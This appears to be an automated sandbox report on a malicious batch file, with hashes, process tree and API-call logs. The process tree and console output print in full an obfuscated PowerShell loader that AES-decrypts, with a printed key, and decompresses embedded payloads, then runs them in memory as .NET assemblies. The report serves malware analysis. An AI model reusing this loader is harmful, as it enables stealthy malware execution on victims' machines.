Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 29, 2023, 2:08 p.m.	April 29, 2023, 2:10 p.m.

Size	620.5KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`b6e57ac15b25e719f377d730eca367e0`
SHA256	`cedf9a618ced39a819a450298dae65fadc2d4004eaa1cbc81867f2d6088a9b4c`
CRC32	`BF82F6D2`
ssdeep	`12288:z1+jN75o4Kq3BTXUgG1zJg+nMC/Gu3oFz5jxykcwe0npWq7ERyz:z1+h75r9gq+nEuYFljFcw7ncq7J`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "WkdlEFUW" C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat
3048
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat
  2200
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat
    196
    - Hash3_old_SC.bat.exe "C:\Users\test22\AppData\Local\Temp\Hash3_old_SC.bat.exe" -w hidden -c $ArcD='CjTnAreajTnAtejTnADecjTnArjTnAypjTnAtorjTnA'.Replace('jTnA', '');$EIyG='ChajTnAngejTnAExtejTnAnsjTnAijTnAonjTnA'.Replace('jTnA', '');$ddrD='TjTnArajTnAnjTnAsjTnAforjTnAmFijTnAnjTnAajTnAlBlojTnAckjTnA'.Replace('jTnA', '');$HZKC='EntjTnArjTnAyPjTnAoinjTnAtjTnA'.Replace('jTnA', '');$fkvT='FrjTnAomBjTnAasejTnA64jTnAStjTnArijTnAngjTnA'.Replace('jTnA', '');$JDCJ='GjTnAetCjTnAurjTnArejTnAntPrjTnAocjTnAejTnAsjTnAsjTnA'.Replace('jTnA', '');$fjGk='SjTnApljTnAitjTnA'.Replace('jTnA', '');$ZJFf='LoajTnAdjTnA'.Replace('jTnA', '');$fsoP='FirsjTnAtjTnA'.Replace('jTnA', '');$GSDe='IjTnAnvjTnAokjTnAejTnA'.Replace('jTnA', '');$WyFb='MaijTnAnMojTnAdujTnAljTnAejTnA'.Replace('jTnA', '');$DKWO='ReadjTnALinjTnAesjTnA'.Replace('jTnA', '');function BrGrP($WUZkx){$aszSW=[System.Security.Cryptography.Aes]::Create();$aszSW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aszSW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aszSW.Key=[System.Convert]::$fkvT('Yg9lQU2I/zPr+3hXJdqcZKMekul1bK9pDFef4vEqPDI=');$aszSW.IV=[System.Convert]::$fkvT('fRifPIwAepUdWFOI5v9eiQ==');$qEOhP=$aszSW.$ArcD();$TIDXf=$qEOhP.$ddrD($WUZkx,0,$WUZkx.Length);$qEOhP.Dispose();$aszSW.Dispose();$TIDXf;}function ZhMnz($WUZkx){$TCOnO=New-Object System.IO.MemoryStream(,$WUZkx);$QqCNk=New-Object System.IO.MemoryStream;$XkOAE=New-Object System.IO.Compression.GZipStream($TCOnO,[IO.Compression.CompressionMode]::Decompress);$XkOAE.CopyTo($QqCNk);$XkOAE.Dispose();$TCOnO.Dispose();$QqCNk.Dispose();$QqCNk.ToArray();}$gfDxw=[System.Linq.Enumerable]::$fsoP([System.IO.File]::$DKWO([System.IO.Path]::$EIyG([System.Diagnostics.Process]::$JDCJ().$WyFb.FileName, $null)));$mxqkG=$gfDxw.Substring(3).$fjGk(':');$VYxVc=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[0])));$yVtIo=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[1])));[System.Reflection.Assembly]::$ZJFf([byte[]]$yVtIo).$HZKC.$GSDe($null,$null);[System.Reflection.Assembly]::$ZJFf([byte[]]$VYxVc).$HZKC.$GSDe($null,$null);
      2384

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA April 29, 2023, 2:08 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW April 29, 2023, 2:08 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 29, 2023, 2:08 p.m.			0	0

Command line console output was observed (32 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: At line:1 char:966 console_handle: 0x0000002f	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: + $ArcD='CjTnAreajTnAtejTnADecjTnArjTnAypjTnAtorjTnA'.Replace('jTnA', '');$EIyG console_handle: 0x0000003b	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: ='ChajTnAngejTnAExtejTnAnsjTnAijTnAonjTnA'.Replace('jTnA', '');$ddrD='TjTnArajT console_handle: 0x00000047	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: nAnjTnAsjTnAforjTnAmFijTnAnjTnAajTnAlBlojTnAckjTnA'.Replace('jTnA', '');$HZKC=' console_handle: 0x00000053	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: EntjTnArjTnAyPjTnAoinjTnAtjTnA'.Replace('jTnA', '');$fkvT='FrjTnAomBjTnAasejTnA console_handle: 0x0000005f	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: 64jTnAStjTnArijTnAngjTnA'.Replace('jTnA', '');$JDCJ='GjTnAetCjTnAurjTnArejTnAnt console_handle: 0x0000006b	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: PrjTnAocjTnAejTnAsjTnAsjTnA'.Replace('jTnA', '');$fjGk='SjTnApljTnAitjTnA'.Repl console_handle: 0x00000077	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: ace('jTnA', '');$ZJFf='LoajTnAdjTnA'.Replace('jTnA', '');$fsoP='FirsjTnAtjTnA'. console_handle: 0x00000083	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: Replace('jTnA', '');$GSDe='IjTnAnvjTnAokjTnAejTnA'.Replace('jTnA', '');$WyFb='M console_handle: 0x0000008f	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: aijTnAnMojTnAdujTnAljTnAejTnA'.Replace('jTnA', '');$DKWO='ReadjTnALinjTnAesjTnA console_handle: 0x0000009b	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: '.Replace('jTnA', '');function BrGrP($WUZkx){$aszSW=[System.Security.Cryptograp console_handle: 0x000000a7	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: hy.Aes]::Create();$aszSW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$a console_handle: 0x000000b3	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: szSW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aszSW.Key=[Syst console_handle: 0x000000bf	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: em.Convert]::$fkvT( <<<< 'Yg9lQU2I/zPr+3hXJdqcZKMekul1bK9pDFef4vEqPDI=');$aszSW console_handle: 0x000000cb	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: .IV=[System.Convert]::$fkvT('fRifPIwAepUdWFOI5v9eiQ==');$qEOhP=$aszSW.$ArcD();$ console_handle: 0x000000d7	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: TIDXf=$qEOhP.$ddrD($WUZkx,0,$WUZkx.Length);$qEOhP.Dispose();$aszSW.Dispose();$T console_handle: 0x000000e3	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: IDXf;}function ZhMnz($WUZkx){$TCOnO=New-Object System.IO.MemoryStream(,$WUZkx); console_handle: 0x000000ef	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: $QqCNk=New-Object System.IO.MemoryStream;$XkOAE=New-Object System.IO.Compressio console_handle: 0x000000fb	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: n.GZipStream($TCOnO,[IO.Compression.CompressionMode]::Decompress);$XkOAE.CopyTo console_handle: 0x00000107	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: ($QqCNk);$XkOAE.Dispose();$TCOnO.Dispose();$QqCNk.Dispose();$QqCNk.ToArray();}$ console_handle: 0x00000113	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: gfDxw=[System.Linq.Enumerable]::$fsoP([System.IO.File]::$DKWO([System.IO.Path]: console_handle: 0x0000011f	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: :$EIyG([System.Diagnostics.Process]::$JDCJ().$WyFb.FileName, $null)));$mxqkG=$g console_handle: 0x0000012b	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: fDxw.Substring(3).$fjGk(':');$VYxVc=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[0]))) console_handle: 0x00000137	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: ;$yVtIo=ZhMnz (BrGrP ([Convert]::$fkvT($mxqkG[1])));[System.Reflection.Assembly console_handle: 0x00000143	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: ]::$ZJFf([byte[]]$yVtIo).$HZKC.$GSDe($null,$null);[System.Reflection.Assembly]: console_handle: 0x0000014f	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: :$ZJFf([byte[]]$VYxVc).$HZKC.$GSDe($null,$null); console_handle: 0x0000015b	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [], ParentContainsErrorR console_handle: 0x00000167	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: ecordException console_handle: 0x00000173	1	1
WriteConsoleW April 29, 2023, 2:08 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken console_handle: 0x0000017f	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e620 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eb20 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e1a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e920 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e920 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e920 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e2a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050dda0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050e460 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eba0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eba0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eba0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eba0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eba0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 29, 2023, 2:08 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0050eba0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 29, 2023, 2:08 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 140 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02810000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73aa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02811000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02812000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fc5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fbc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fcc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fb9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 29, 2023, 2:08 p.m.	process_identifier: 2384 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ab5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
